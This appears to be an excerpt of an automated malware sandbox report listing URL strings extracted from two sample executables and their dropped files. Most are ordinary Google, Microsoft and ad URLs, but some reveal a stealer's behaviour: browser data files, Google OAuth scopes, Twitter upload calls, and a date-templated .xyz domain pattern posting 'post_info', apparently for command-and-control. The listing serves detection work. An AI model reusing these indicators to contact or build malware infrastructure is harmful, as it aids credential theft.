Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 56BB1610C0318054.exe, 00000002.00000002.414835494.000000000344F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9
Source: Cyfj6XGbkd.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: Cyfj6XGbkd.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEE
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373650211.0000000003D49000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/c
Source: 56BB1610C0318054.exe, 00000004.00000003.373650211.0000000003D49000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 56BB1610C0318054.exe, 00000004.00000003.373930371.0000000003D44000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appQAB
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appQAB%HRQ
Source: 56BB1610C0318054.exeString found in binary or memory: https://drive.google.com/drive/settings
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settingsr
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 56BB1610C0318054.exeString found in binary or memory: https://mail.google.com/mail
Source: 56BB1610C0318054.exeString found in binary or memory: https://mail.google.com/mail/#settings
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settingsox
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: 56BB1610C0318054.exeString found in binary or memory: https://payments.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsdVA0HSE
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsJtW23HRG
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx7w
Source: 56BB1610C0318054.exe, 00000002.00000003.409306143.0000000004128000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashAM
Source: 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.371026243.0000000003813000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376084985.0000000003D38000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp, ecvFEAD.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=1824632442.1601478955
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 56BB1610C0318054.exe, ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorSV4HR
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/calend
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly)
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingY
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyOnTP1HRE
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetingsn
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwritecon
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373528673.0000000003D3E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.emaila
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
